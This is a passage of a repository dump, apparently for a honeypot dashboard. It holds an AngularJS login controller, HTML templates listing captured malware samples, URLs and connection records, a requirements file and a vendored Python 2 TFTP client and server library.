$http, $routeParams, $location) { $scope.loggedin = false; $scope.errormsg = null; $scope.username = null; $scope.password = null; $scope.new_username = null; $scope.new_password = null; $scope.login = function() { var auth = btoa($scope.username + ":" + $scope.password); $http.defaults.headers.common['Authorization'] = 'Basic ' + auth; $http.get(api + "/login").then(function (httpResult) { $scope.errormsg = "Logged in as " + $scope.username; $scope.loggedin = true; }, function (httpError) { $scope.errormsg = "Bad credentials"; }); $scope.password = null; }; $scope.logout = function() { delete $http.defaults.headers.common['Authorization']; $scope.errormsg = null; $scope.loggedin = false; $scope.username = null; $scope.password = null; }; $scope.addUser = function() { var newuser = { "username": $scope.new_username, "password": $scope.new_password }; $http.put(api + "/user/" + newuser.username, newuser).then(function (httpResult) { $scope.errormsg = "Created new user " + $scope.new_username; $scope.new_username = null; $scope.new_password = null; }, function (httpError) { $scope.errormsg = "Error creating new user \"" + $scope.new_username + "\" :("; $scope.new_username = null; $scope.new_password = null; }); }; }); ================================================ FILE: html/samples.html ================================================

Samples

Name Size (Bytes) First Seen
{{ sample.name }} {{ sample.length }} {{ formatDate(sample.date) }}
================================================ FILE: html/tag.html ================================================

Tag Info

Name{{ tag.name }}
Code{{ tag.code }}
N° Hits{{ tag.connections.length }}

Connections

================================================ FILE: html/tags.html ================================================

Tags

Name Code N° Hits
{{ tag.name }} {{ tag.code }} {{ tag.connections }}
================================================ FILE: html/url.html ================================================

URL Info

URL{{ url.url }}
First seen{{ formatDate(url.date) }}
Resolves to {{ url.countryname }}
{{ url.ip }}
AS{{ url.asn.asn }} {{ url.asn.name }}

Sample

First seen{{ formatDate(url.sample.date) }}
First seen file name{{ url.sample.name }}
File size{{ url.sample.length }} Bytes
SHA256{{ url.sample.sha256 }}
Virustotal result{{ nicenull(url.sample.result, "Not Scanned yet") }}

Connections including this URL

Date IP Username Password
{{ formatDate(connection.date) }} {{ connection.ip }} {{ connection.user }} {{ connection.pass }}
================================================ FILE: html/urls.html ================================================

Urls

Country Url Date
{{ url.countryname }} {{ url.url }} {{ formatDate(url.date) }}
================================================ FILE: requirements.txt ================================================ setuptools werkzeug flask flask-httpauth flask-socketio sqlalchemy requests decorator dnspython ipaddress simpleeval pyyaml argon2 eventlet ================================================ FILE: tftpy/TftpClient.py ================================================ """This module implements the TFTP Client functionality. Instantiate an instance of the client, and then use its upload or download method. Logging is performed via a standard logging object set in TftpShared.""" import types from TftpShared import * from TftpPacketTypes import * from TftpContexts import TftpContextClientDownload, TftpContextClientUpload class TftpClient(TftpSession): """This class is an implementation of a tftp client. Once instantiated, a download can be initiated via the download() method, or an upload via the upload() method.""" def __init__(self, host, port, options={}): TftpSession.__init__(self) self.context = None self.host = host self.iport = port self.filename = None self.options = options if self.options.has_key('blksize'): size = self.options['blksize'] tftpassert(types.IntType == type(size), "blksize must be an int") if size < MIN_BLKSIZE or size > MAX_BLKSIZE: raise TftpException, "Invalid blksize: %d" % size def download(self, filename, output, packethook=None, timeout=SOCK_TIMEOUT): """This method initiates a tftp download from the configured remote host, requesting the filename passed. It saves the file to a local file specified in the output parameter. If a packethook is provided, it must be a function that takes a single parameter, which will be a copy of each DAT packet received in the form of a TftpPacketDAT object. The timeout parameter may be used to override the default SOCK_TIMEOUT setting, which is the amount of time that the client will wait for a receive packet to arrive. Note: If output is a hyphen then stdout is used.""" # We're downloading. 
log.debug("Creating download context with the following params:") log.debug("host = %s, port = %s, filename = %s, output = %s" % (self.host, self.iport, filename, output)) log.debug("options = %s, packethook = %s, timeout = %s" % (self.options, packethook, timeout)) self.context = TftpContextClientDownload(self.host, self.iport, filename, output, self.options, packethook, timeout) self.context.start() # Download happens here self.context.end() metrics = self.context.metrics log.info('') log.info("Download complete.") if metrics.duration == 0: log.info("Duration too short, rate undetermined") else: log.info("Downloaded %.2f bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) log.info("Average rate: %.2f kbps" % metrics.kbps) log.info("%.2f bytes in resent data" % metrics.resent_bytes) log.info("Received %d duplicate packets" % metrics.dupcount) def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT): """This method initiates a tftp upload to the configured remote host, uploading the filename passed. If a packethook is provided, it must be a function that takes a single parameter, which will be a copy of each DAT packet sent in the form of a TftpPacketDAT object. The timeout parameter may be used to override the default SOCK_TIMEOUT setting, which is the amount of time that the client will wait for a DAT packet to be ACKd by the server. The input option is the full path to the file to upload, which can optionally be '-' to read from stdin. 
Note: If output is a hyphen then stdout is used.""" self.context = TftpContextClientUpload(self.host, self.iport, filename, input, self.options, packethook, timeout) self.context.start() # Upload happens here self.context.end() metrics = self.context.metrics log.info('') log.info("Upload complete.") if metrics.duration == 0: log.info("Duration too short, rate undetermined") else: log.info("Uploaded %d bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) log.info("Average rate: %.2f kbps" % metrics.kbps) log.info("%.2f bytes in resent data" % metrics.resent_bytes) log.info("Resent %d packets" % metrics.dupcount) ================================================ FILE: tftpy/TftpContexts.py ================================================ """This module implements all contexts for state handling during uploads and downloads, the main interface to which being the TftpContext base class. The concept is simple. Each context object represents a single upload or download, and the state object in the context object represents the current state of that transfer. The state object has a handle() method that expects the next packet in the transfer, and returns a state object until the transfer is complete, at which point it returns None. 
That is, unless there is a fatal error, in which case a TftpException is returned instead.""" from TftpShared import * from TftpPacketTypes import * from TftpPacketFactory import TftpPacketFactory from TftpStates import * import socket, time, sys ############################################################################### # Utility classes ############################################################################### class TftpMetrics(object): """A class representing metrics of the transfer.""" def __init__(self): # Bytes transferred self.bytes = 0 # Bytes re-sent self.resent_bytes = 0 # Duplicate packets received self.dups = {} self.dupcount = 0 # Times self.start_time = 0 self.end_time = 0 self.duration = 0 # Rates self.bps = 0 self.kbps = 0 # Generic errors self.errors = 0 def compute(self): # Compute transfer time self.duration = self.end_time - self.start_time if self.duration == 0: self.duration = 1 log.debug("TftpMetrics.compute: duration is %s" % self.duration) self.bps = (self.bytes * 8.0) / self.duration self.kbps = self.bps / 1024.0 log.debug("TftpMetrics.compute: kbps is %s" % self.kbps) for key in self.dups: self.dupcount += self.dups[key] def add_dup(self, pkt): """This method adds a dup for a packet to the metrics.""" log.debug("Recording a dup of %s" % pkt) s = str(pkt) if self.dups.has_key(s): self.dups[s] += 1 else: self.dups[s] = 1 tftpassert(self.dups[s] < MAX_DUPS, "Max duplicates reached") ############################################################################### # Context classes ############################################################################### class TftpContext(object): """The base class of the contexts.""" def __init__(self, host, port, timeout, dyn_file_func=None): """Constructor for the base context, setting shared instance variables.""" self.file_to_transfer = None self.fileobj = None self.options = None self.packethook = None self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 
self.sock.settimeout(timeout) self.timeout = timeout self.state = None self.next_block = 0 self.factory = TftpPacketFactory() # Note, setting the host will also set self.address, as it's a property. self.host = host self.port = port # The port associated with the TID self.tidport = None # Metrics self.metrics = TftpMetrics() # Fluag when the transfer is pending completion. self.pending_complete = False # Time when this context last received any traffic. # FIXME: does this belong in metrics? self.last_update = 0 # The last packet we sent, if applicable, to make resending easy. self.last_pkt = None self.dyn_file_func = dyn_file_func # Count the number of retry attempts. self.retry_count = 0 def getBlocksize(self): """Fetch the current blocksize for this session.""" return int(self.options.get('blksize', 512)) def __del__(self): """Simple destructor to try to call housekeeping in the end method if not called explicitely. Leaking file descriptors is not a good thing.""" self.end() def checkTimeout(self, now): """Compare current time with last_update time, and raise an exception if we're over the timeout time.""" log.debug("checking for timeout on session %s" % self) if now - self.last_update > self.timeout: raise TftpTimeout, "Timeout waiting for traffic" def start(self): raise NotImplementedError, "Abstract method" def end(self): """Perform session cleanup, since the end method should always be called explicitely by the calling code, this works better than the destructor.""" log.debug("in TftpContext.end") if self.fileobj is not None and not self.fileobj.closed: log.debug("self.fileobj is open - closing") self.fileobj.close() def gethost(self): "Simple getter method for use in a property." 
return self.__host def sethost(self, host): """Setter method that also sets the address property as a result of the host that is set.""" self.__host = host self.address = socket.gethostbyname(host) host = property(gethost, sethost) def setNextBlock(self, block): if block >= 2 ** 16: log.debug("Block number rollover to 0 again") block = 0 self.__eblock = block def getNextBlock(self): return self.__eblock next_block = property(getNextBlock, setNextBlock) def cycle(self): """Here we wait for a response from the server after sending it something, and dispatch appropriate action to that response.""" try: (buffer, (raddress, rport)) = self.sock.recvfrom(MAX_BLKSIZE) except socket.timeout: log.warn("Timeout waiting for traffic, retrying...") raise TftpTimeout, "Timed-out waiting for traffic" # Ok, we've received a packet. Log it. log.debug("Received %d bytes from %s:%s" % (len(buffer), raddress, rport)) # And update our last updated time. self.last_update = time.time() # Decode it. recvpkt = self.factory.parse(buffer) # Check for known "connection". if raddress != self.address: log.warn("Received traffic from %s, expected host %s. Discarding" % (raddress, self.host)) if self.tidport and self.tidport != rport: log.warn("Received traffic from %s:%s but we're " "connected to %s:%s. Discarding." % (raddress, rport, self.host, self.tidport)) # If there is a packethook defined, call it. We unconditionally # pass all packets, it's up to the client to screen out different # kinds of packets. This way, the client is privy to things like # negotiated options. if self.packethook: self.packethook(recvpkt) # And handle it, possibly changing state. self.state = self.state.handle(recvpkt, raddress, rport) # If we didn't throw any exceptions here, reset the retry_count to # zero. 
self.retry_count = 0 class TftpContextServer(TftpContext): """The context for the server.""" def __init__(self, host, port, timeout, root, dyn_file_func=None): TftpContext.__init__(self, host, port, timeout, dyn_file_func ) # At this point we have no idea if this is a download or an upload. We # need to let the start state determine that. self.state = TftpStateServerStart(self) self.root = root self.dyn_file_func = dyn_file_func def __str__(self): return "%s:%s %s" % (self.host, self.port, self.state) def start(self, buffer): """Start the state cycle. Note that the server context receives an initial packet in its start method. Also note that the server does not loop on cycle(), as it expects the TftpServer object to manage that.""" log.debug("In TftpContextServer.start") self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s" % self.metrics.start_time) # And update our last updated time. self.last_update = time.time() pkt = self.factory.parse(buffer) log.debug("TftpContextServer.start() - factory returned a %s" % pkt) # Call handle once with the initial packet. This should put us into # the download or the upload state. self.state = self.state.handle(pkt, self.host, self.port) def end(self): """Finish up the context.""" TftpContext.end(self) self.metrics.end_time = time.time() log.debug("Set metrics.end_time to %s" % self.metrics.end_time) self.metrics.compute() class TftpContextClientUpload(TftpContext): """The upload context for the client during an upload. 
Note: If input is a hyphen, then we will use stdin.""" def __init__(self, host, port, filename, input, options, packethook, timeout): TftpContext.__init__(self, host, port, timeout) self.file_to_transfer = filename self.options = options self.packethook = packethook if input == '-': self.fileobj = sys.stdin else: self.fileobj = open(input, "rb") log.debug("TftpContextClientUpload.__init__()") log.debug("file_to_transfer = %s, options = %s" % (self.file_to_transfer, self.options)) def __str__(self): return "%s:%s %s" % (self.host, self.port, self.state) def start(self): log.info("Sending tftp upload request to %s" % self.host) log.info(" filename -> %s" % self.file_to_transfer) log.info(" options -> %s" % self.options) self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s" % self.metrics.start_time) # FIXME: put this in a sendWRQ method? pkt = TftpPacketWRQ() pkt.filename = self.file_to_transfer pkt.mode = "octet" # FIXME - shouldn't hardcode this pkt.options = self.options self.sock.sendto(pkt.encode().buffer, (self.host, self.port)) self.next_block = 1 self.last_pkt = pkt # FIXME: should we centralize sendto operations so we can refactor all # saving of the packet to the last_pkt field? self.state = TftpStateSentWRQ(self) while self.state: try: log.debug("State is %s" % self.state) self.cycle() except TftpTimeout, err: log.error(str(err)) self.retry_count += 1 if self.retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries, giving up") raise else: log.warn("resending last packet") self.state.resendLast() def end(self): """Finish up the context.""" TftpContext.end(self) self.metrics.end_time = time.time() log.debug("Set metrics.end_time to %s" % self.metrics.end_time) self.metrics.compute() class TftpContextClientDownload(TftpContext): """The download context for the client during a download. 
Note: If output is a hyphen, then the output will be sent to stdout.""" def __init__(self, host, port, filename, output, options, packethook, timeout): TftpContext.__init__(self, host, port, timeout) # FIXME: should we refactor setting of these params? self.file_to_transfer = filename self.options = options self.packethook = packethook # FIXME - need to support alternate return formats than files? # File-like objects would be ideal, ala duck-typing. # If the filename is -, then use stdout if output == '-': self.fileobj = sys.stdout elif type(output) == str: self.fileobj = open(output, "wb") else: self.fileobj = output log.debug("TftpContextClientDownload.__init__()") log.debug("file_to_transfer = %s, options = %s" % (self.file_to_transfer, self.options)) def __str__(self): return "%s:%s %s" % (self.host, self.port, self.state) def start(self): """Initiate the download.""" log.info("Sending tftp download request to %s" % self.host) log.info(" filename -> %s" % self.file_to_transfer) log.info(" options -> %s" % self.options) self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s" % self.metrics.start_time) # FIXME: put this in a sendRRQ method? 
pkt = TftpPacketRRQ() pkt.filename = self.file_to_transfer pkt.mode = "octet" # FIXME - shouldn't hardcode this pkt.options = self.options self.sock.sendto(pkt.encode().buffer, (self.host, self.port)) self.next_block = 1 self.last_pkt = pkt self.state = TftpStateSentRRQ(self) while self.state: try: log.debug("State is %s" % self.state) self.cycle() except TftpTimeout, err: log.error(str(err)) self.retry_count += 1 if self.retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries, giving up") raise else: log.warn("resending last packet") self.state.resendLast() def end(self): """Finish up the context.""" TftpContext.end(self) self.metrics.end_time = time.time() log.debug("Set metrics.end_time to %s" % self.metrics.end_time) self.metrics.compute() ================================================ FILE: tftpy/TftpPacketFactory.py ================================================ """This module implements the TftpPacketFactory class, which can take a binary buffer, and return the appropriate TftpPacket object to represent it, via the parse() method.""" from TftpShared import * from TftpPacketTypes import * class TftpPacketFactory(object): """This class generates TftpPacket objects. It is responsible for parsing raw buffers off of the wire and returning objects representing them, via the parse() method.""" def __init__(self): self.classes = { 1: TftpPacketRRQ, 2: TftpPacketWRQ, 3: TftpPacketDAT, 4: TftpPacketACK, 5: TftpPacketERR, 6: TftpPacketOACK } def parse(self, buffer): """This method is used to parse an existing datagram into its corresponding TftpPacket object. 
The buffer is the raw bytes off of the network.""" log.debug("parsing a %d byte packet" % len(buffer)) (opcode,) = struct.unpack("!H", buffer[:2]) log.debug("opcode is %d" % opcode) packet = self.__create(opcode) packet.buffer = buffer return packet.decode() def __create(self, opcode): """This method returns the appropriate class object corresponding to the passed opcode.""" tftpassert(self.classes.has_key(opcode), "Unsupported opcode: %d" % opcode) packet = self.classes[opcode]() return packet ================================================ FILE: tftpy/TftpPacketTypes.py ================================================ """This module implements the packet types of TFTP itself, and the corresponding encode and decode methods for them.""" import struct from TftpShared import * class TftpSession(object): """This class is the base class for the tftp client and server. Any shared code should be in this class.""" # FIXME: do we need this anymore? pass class TftpPacketWithOptions(object): """This class exists to permit some TftpPacket subclasses to share code regarding options handling. It does not inherit from TftpPacket, as the goal is just to share code here, and not cause diamond inheritance.""" def __init__(self): self.options = {} def setoptions(self, options): log.debug("in TftpPacketWithOptions.setoptions") log.debug("options: " + str(options)) myoptions = {} for key in options: newkey = str(key) myoptions[newkey] = str(options[key]) log.debug("populated myoptions with %s = %s" % (newkey, myoptions[newkey])) log.debug("setting options hash to: " + str(myoptions)) self._options = myoptions def getoptions(self): log.debug("in TftpPacketWithOptions.getoptions") return self._options # Set up getter and setter on options to ensure that they are the proper # type. They should always be strings, but we don't need to force the # client to necessarily enter strings if we can avoid it. 
options = property(getoptions, setoptions) def decode_options(self, buffer): """This method decodes the section of the buffer that contains an unknown number of options. It returns a dictionary of option names and values.""" format = "!" options = {} log.debug("decode_options: buffer is: " + repr(buffer)) log.debug("size of buffer is %d bytes" % len(buffer)) if len(buffer) == 0: log.debug("size of buffer is zero, returning empty hash") return {} # Count the nulls in the buffer. Each one terminates a string. log.debug("about to iterate options buffer counting nulls") length = 0 for c in buffer: #log.debug("iterating this byte: " + repr(c)) if ord(c) == 0: log.debug("found a null at length %d" % length) if length > 0: format += "%dsx" % length length = -1 else: raise TftpException, "Invalid options in buffer" length += 1 log.debug("about to unpack, format is: %s" % format) mystruct = struct.unpack(format, buffer) tftpassert(len(mystruct) % 2 == 0, "packet with odd number of option/value pairs") for i in range(0, len(mystruct), 2): log.debug("setting option %s to %s" % (mystruct[i], mystruct[i+1])) options[mystruct[i]] = mystruct[i+1] return options class TftpPacket(object): """This class is the parent class of all tftp packet classes. It is an abstract class, providing an interface, and should not be instantiated directly.""" def __init__(self): self.opcode = 0 self.buffer = None def encode(self): """The encode method of a TftpPacket takes keyword arguments specific to the type of packet, and packs an appropriate buffer in network-byte order suitable for sending over the wire. This is an abstract method.""" raise NotImplementedError, "Abstract method" def decode(self): """The decode method of a TftpPacket takes a buffer off of the wire in network-byte order, and decodes it, populating internal properties as appropriate. This can only be done once the first 2-byte opcode has already been decoded, but the data section does include the entire datagram. 
This is an abstract method.""" raise NotImplementedError, "Abstract method" class TftpPacketInitial(TftpPacket, TftpPacketWithOptions): """This class is a common parent class for the RRQ and WRQ packets, as they share quite a bit of code.""" def __init__(self): TftpPacket.__init__(self) TftpPacketWithOptions.__init__(self) self.filename = None self.mode = None def encode(self): """Encode the packet's buffer from the instance variables.""" tftpassert(self.filename, "filename required in initial packet") tftpassert(self.mode, "mode required in initial packet") ptype = None if self.opcode == 1: ptype = "RRQ" else: ptype = "WRQ" log.debug("Encoding %s packet, filename = %s, mode = %s" % (ptype, self.filename, self.mode)) for key in self.options: log.debug(" Option %s = %s" % (key, self.options[key])) format = "!H" format += "%dsx" % len(self.filename) if self.mode == "octet": format += "5sx" else: raise AssertionError, "Unsupported mode: %s" % mode # Add options. options_list = [] if self.options.keys() > 0: log.debug("there are options to encode") for key in self.options: # Populate the option name format += "%dsx" % len(key) options_list.append(key) # Populate the option value format += "%dsx" % len(str(self.options[key])) options_list.append(str(self.options[key])) log.debug("format is %s" % format) log.debug("options_list is %s" % options_list) log.debug("size of struct is %d" % struct.calcsize(format)) self.buffer = struct.pack(format, self.opcode, self.filename, self.mode, *options_list) log.debug("buffer is " + repr(self.buffer)) return self def decode(self): tftpassert(self.buffer, "Can't decode, buffer is empty") # FIXME - this shares a lot of code with decode_options nulls = 0 format = "" nulls = length = tlength = 0 log.debug("in decode: about to iterate buffer counting nulls") subbuf = self.buffer[2:] for c in subbuf: log.debug("iterating this byte: " + repr(c)) if ord(c) == 0: nulls += 1 log.debug("found a null at length %d, now have %d" % (length, nulls)) 
format += "%dsx" % length length = -1 # At 2 nulls, we want to mark that position for decoding. if nulls == 2: break length += 1 tlength += 1 log.debug("hopefully found end of mode at length %d" % tlength) # length should now be the end of the mode. tftpassert(nulls == 2, "malformed packet") shortbuf = subbuf[:tlength+1] log.debug("about to unpack buffer with format: %s" % format) log.debug("unpacking buffer: " + repr(shortbuf)) mystruct = struct.unpack(format, shortbuf) tftpassert(len(mystruct) == 2, "malformed packet") self.filename = mystruct[0] self.mode = mystruct[1].lower() # force lc - bug 17 log.debug("set filename to %s" % self.filename) log.debug("set mode to %s" % self.mode) self.options = self.decode_options(subbuf[tlength+1:]) return self class TftpPacketRRQ(TftpPacketInitial): """ :: 2 bytes string 1 byte string 1 byte ----------------------------------------------- RRQ/ | 01/02 | Filename | 0 | Mode | 0 | WRQ ----------------------------------------------- """ def __init__(self): TftpPacketInitial.__init__(self) self.opcode = 1 def __str__(self): s = 'RRQ packet: filename = %s' % self.filename s += ' mode = %s' % self.mode if self.options: s += '\n options = %s' % self.options return s class TftpPacketWRQ(TftpPacketInitial): """ :: 2 bytes string 1 byte string 1 byte ----------------------------------------------- RRQ/ | 01/02 | Filename | 0 | Mode | 0 | WRQ ----------------------------------------------- """ def __init__(self): TftpPacketInitial.__init__(self) self.opcode = 2 def __str__(self): s = 'WRQ packet: filename = %s' % self.filename s += ' mode = %s' % self.mode if self.options: s += '\n options = %s' % self.options return s class TftpPacketDAT(TftpPacket): """ :: 2 bytes 2 bytes n bytes --------------------------------- DATA | 03 | Block # | Data | --------------------------------- """ def __init__(self): TftpPacket.__init__(self) self.opcode = 3 self.blocknumber = 0 self.data = None def __str__(self): s = 'DAT packet: block %s' % 
self.blocknumber if self.data: s += '\n data: %d bytes' % len(self.data) return s def encode(self): """Encode the DAT packet. This method populates self.buffer, and returns self for easy method chaining.""" if len(self.data) == 0: log.debug("Encoding an empty DAT packet") format = "!HH%ds" % len(self.data) self.buffer = struct.pack(format, self.opcode, self.blocknumber, self.data) return self def decode(self): """Decode self.buffer into instance variables. It returns self for easy method chaining.""" # We know the first 2 bytes are the opcode. The second two are the # block number. (self.blocknumber,) = struct.unpack("!H", self.buffer[2:4]) log.debug("decoding DAT packet, block number %d" % self.blocknumber) log.debug("should be %d bytes in the packet total" % len(self.buffer)) # Everything else is data. self.data = self.buffer[4:] log.debug("found %d bytes of data" % len(self.data)) return self class TftpPacketACK(TftpPacket): """ :: 2 bytes 2 bytes ------------------- ACK | 04 | Block # | -------------------- """ def __init__(self): TftpPacket.__init__(self) self.opcode = 4 self.blocknumber = 0 def __str__(self): return 'ACK packet: block %d' % self.blocknumber def encode(self): log.debug("encoding ACK: opcode = %d, block = %d" % (self.opcode, self.blocknumber)) self.buffer = struct.pack("!HH", self.opcode, self.blocknumber) return self def decode(self): self.opcode, self.blocknumber = struct.unpack("!HH", self.buffer) log.debug("decoded ACK packet: opcode = %d, block = %d" % (self.opcode, self.blocknumber)) return self class TftpPacketERR(TftpPacket): """ :: 2 bytes 2 bytes string 1 byte ---------------------------------------- ERROR | 05 | ErrorCode | ErrMsg | 0 | ---------------------------------------- Error Codes Value Meaning 0 Not defined, see error message (if any). 1 File not found. 2 Access violation. 3 Disk full or allocation exceeded. 4 Illegal TFTP operation. 5 Unknown transfer ID. 6 File already exists. 7 No such user. 
8 Failed to negotiate options """ def __init__(self): TftpPacket.__init__(self) self.opcode = 5 self.errorcode = 0 # FIXME: We don't encode the errmsg... self.errmsg = None # FIXME - integrate in TftpErrors references? self.errmsgs = { 1: "File not found", 2: "Access violation", 3: "Disk full or allocation exceeded", 4: "Illegal TFTP operation", 5: "Unknown transfer ID", 6: "File already exists", 7: "No such user", 8: "Failed to negotiate options" } def __str__(self): s = 'ERR packet: errorcode = %d' % self.errorcode s += '\n msg = %s' % self.errmsgs.get(self.errorcode, '') return s def encode(self): """Encode the DAT packet based on instance variables, populating self.buffer, returning self.""" format = "!HH%dsx" % len(self.errmsgs[self.errorcode]) log.debug("encoding ERR packet with format %s" % format) self.buffer = struct.pack(format, self.opcode, self.errorcode, self.errmsgs[self.errorcode]) return self def decode(self): "Decode self.buffer, populating instance variables and return self." 
buflen = len(self.buffer) tftpassert(buflen >= 4, "malformed ERR packet, too short") log.debug("Decoding ERR packet, length %s bytes" % buflen) if buflen == 4: log.debug("Allowing this affront to the RFC of a 4-byte packet") format = "!HH" log.debug("Decoding ERR packet with format: %s" % format) self.opcode, self.errorcode = struct.unpack(format, self.buffer) else: log.debug("Good ERR packet > 4 bytes") format = "!HH%dsx" % (len(self.buffer) - 5) log.debug("Decoding ERR packet with format: %s" % format) self.opcode, self.errorcode, self.errmsg = struct.unpack(format, self.buffer) log.error("ERR packet - errorcode: %d, message: %s" % (self.errorcode, self.errmsg)) return self class TftpPacketOACK(TftpPacket, TftpPacketWithOptions): """ :: +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+ | opc | opt1 | 0 | value1 | 0 | optN | 0 | valueN | 0 | +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+ """ def __init__(self): TftpPacket.__init__(self) TftpPacketWithOptions.__init__(self) self.opcode = 6 def __str__(self): return 'OACK packet:\n options = %s' % self.options def encode(self): format = "!H" # opcode options_list = [] log.debug("in TftpPacketOACK.encode") for key in self.options: log.debug("looping on option key %s" % key) log.debug("value is %s" % self.options[key]) format += "%dsx" % len(key) format += "%dsx" % len(self.options[key]) options_list.append(key) options_list.append(self.options[key]) self.buffer = struct.pack(format, self.opcode, *options_list) return self def decode(self): self.options = self.decode_options(self.buffer[2:]) return self def match_options(self, options): """This method takes a set of options, and tries to match them with its own. It can accept some changes in those options from the server as part of a negotiation. 
Changed or unchanged, it will return a dict of the options so that the session can update itself to the negotiated options.""" for name in self.options: if options.has_key(name): if name == 'blksize': # We can accept anything between the min and max values. size = self.options[name] if size >= MIN_BLKSIZE and size <= MAX_BLKSIZE: log.debug("negotiated blksize of %d bytes" % size) options[blksize] = size else: raise TftpException, "Unsupported option: %s" % name return True ================================================ FILE: tftpy/TftpServer.py ================================================ """This module implements the TFTP Server functionality. Instantiate an instance of the server, and then run the listen() method to listen for client requests. Logging is performed via a standard logging object set in TftpShared.""" import socket, os, time import select from TftpShared import * from TftpPacketTypes import * from TftpPacketFactory import TftpPacketFactory from TftpContexts import TftpContextServer class TftpServer(TftpSession): """This class implements a tftp server object. Run the listen() method to listen for client requests. It takes two optional arguments. tftproot is the path to the tftproot directory to serve files from and/or write them to. dyn_file_func is a callable that must return a file-like object to read from during downloads. This permits the serving of dynamic content.""" def __init__(self, tftproot='/tftpboot', dyn_file_func=None): self.listenip = None self.listenport = None self.sock = None # FIXME: What about multiple roots? self.root = os.path.abspath(tftproot) self.dyn_file_func = dyn_file_func # A dict of sessions, where each session is keyed by a string like # ip:tid for the remote end. self.sessions = {} if os.path.exists(self.root): log.debug("tftproot %s does exist" % self.root) if not os.path.isdir(self.root): raise TftpException, "The tftproot must be a directory." 
else: log.debug("tftproot %s is a directory" % self.root) if os.access(self.root, os.R_OK): log.debug("tftproot %s is readable" % self.root) else: raise TftpException, "The tftproot must be readable" if os.access(self.root, os.W_OK): log.debug("tftproot %s is writable" % self.root) else: log.warning("The tftproot %s is not writable" % self.root) else: raise TftpException, "The tftproot does not exist." def listen(self, listenip="", listenport=DEF_TFTP_PORT, timeout=SOCK_TIMEOUT): """Start a server listening on the supplied interface and port. This defaults to INADDR_ANY (all interfaces) and UDP port 69. You can also supply a different socket timeout value, if desired.""" tftp_factory = TftpPacketFactory() # Don't use new 2.5 ternary operator yet # listenip = listenip if listenip else '0.0.0.0' if not listenip: listenip = '0.0.0.0' log.info("Server requested on ip %s, port %s" % (listenip, listenport)) try: # FIXME - sockets should be non-blocking self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.bind((listenip, listenport)) except socket.error, err: # Reraise it for now. raise log.info("Starting receive loop...") while True: # Build the inputlist array of sockets to select() on. inputlist = [] inputlist.append(self.sock) for key in self.sessions: inputlist.append(self.sessions[key].sock) # Block until some socket has input on it. log.debug("Performing select on this inputlist: %s" % inputlist) readyinput, readyoutput, readyspecial = select.select(inputlist, [], [], SOCK_TIMEOUT) deletion_list = [] # Handle the available data, if any. Maybe we timed-out. for readysock in readyinput: # Is the traffic on the main server socket? ie. new session? if readysock == self.sock: log.debug("Data ready on our main socket") buffer, (raddress, rport) = self.sock.recvfrom(MAX_BLKSIZE) log.debug("Read %d bytes" % len(buffer)) # Forge a session key based on the client's IP and port, # which should safely work through NAT. 
key = "%s:%s" % (raddress, rport) if not self.sessions.has_key(key): log.debug("Creating new server context for " "session key = %s" % key) self.sessions[key] = TftpContextServer(raddress, rport, timeout, self.root, self.dyn_file_func) try: self.sessions[key].start(buffer) except TftpException, err: deletion_list.append(key) log.error("Fatal exception thrown from " "session %s: %s" % (key, str(err))) else: log.warn("received traffic on main socket for " "existing session??") log.info("Currently handling these sessions:") for session_key, session in self.sessions.items(): log.info(" %s" % session) else: # Must find the owner of this traffic. for key in self.sessions: if readysock == self.sessions[key].sock: log.info("Matched input to session key %s" % key) try: self.sessions[key].cycle() if self.sessions[key].state == None: log.info("Successful transfer.") deletion_list.append(key) except TftpException, err: deletion_list.append(key) log.error("Fatal exception thrown from " "session %s: %s" % (key, str(err))) # Break out of for loop since we found the correct # session. break else: log.error("Can't find the owner for this packet. 
" "Discarding.") log.debug("Looping on all sessions to check for timeouts") now = time.time() for key in self.sessions: try: self.sessions[key].checkTimeout(now) except TftpTimeout, err: log.error(str(err)) self.sessions[key].retry_count += 1 if self.sessions[key].retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries on %s, giving up" % self.sessions[key]) deletion_list.append(key) else: log.debug("resending on session %s" % self.sessions[key]) self.sessions[key].state.resendLast() log.debug("Iterating deletion list.") for key in deletion_list: log.info('') log.info("Session %s complete" % key) if self.sessions.has_key(key): log.debug("Gathering up metrics from session before deleting") self.sessions[key].end() metrics = self.sessions[key].metrics if metrics.duration == 0: log.info("Duration too short, rate undetermined") else: log.info("Transferred %d bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) log.info("Average rate: %.2f kbps" % metrics.kbps) log.info("%.2f bytes in resent data" % metrics.resent_bytes) log.info("%d duplicate packets" % metrics.dupcount) log.debug("Deleting session %s" % key) del self.sessions[key] log.debug("Session list is now %s" % self.sessions) else: log.warn("Strange, session %s is not on the deletion list" % key) ================================================ FILE: tftpy/TftpShared.py ================================================ """This module holds all objects shared by all other modules in tftpy.""" import logging LOG_LEVEL = logging.NOTSET MIN_BLKSIZE = 8 DEF_BLKSIZE = 512 MAX_BLKSIZE = 65536 SOCK_TIMEOUT = 5 MAX_DUPS = 20 TIMEOUT_RETRIES = 5 DEF_TFTP_PORT = 69 # A hook for deliberately introducing delay in testing. DELAY_BLOCK = 0 # Initialize the logger. logging.basicConfig() # The logger used by this library. Feel free to clobber it with your own, if you like, as # long as it conforms to Python's logging. 
log = logging.getLogger('tftpy')

def tftpassert(condition, msg):
    """This function is a simple utility that will check the condition
    passed for a false state. If it finds one, it throws a TftpException
    with the message passed. This just makes the code throughout cleaner
    by refactoring."""
    if not condition:
        raise TftpException, msg

def setLogLevel(level):
    """This function is a utility function for setting the internal log level.
    The log level defaults to logging.NOTSET, so unwanted output to stdout is
    not created."""
    # 'global log' is not strictly required just to call setLevel, but it
    # makes the dependency on the module-level logger explicit.
    global log
    log.setLevel(level)

class TftpErrors(object):
    """This class is a convenience for defining the common tftp error codes,
    and making them more readable in the code."""
    # Numeric values match the ERR packet error codes listed in
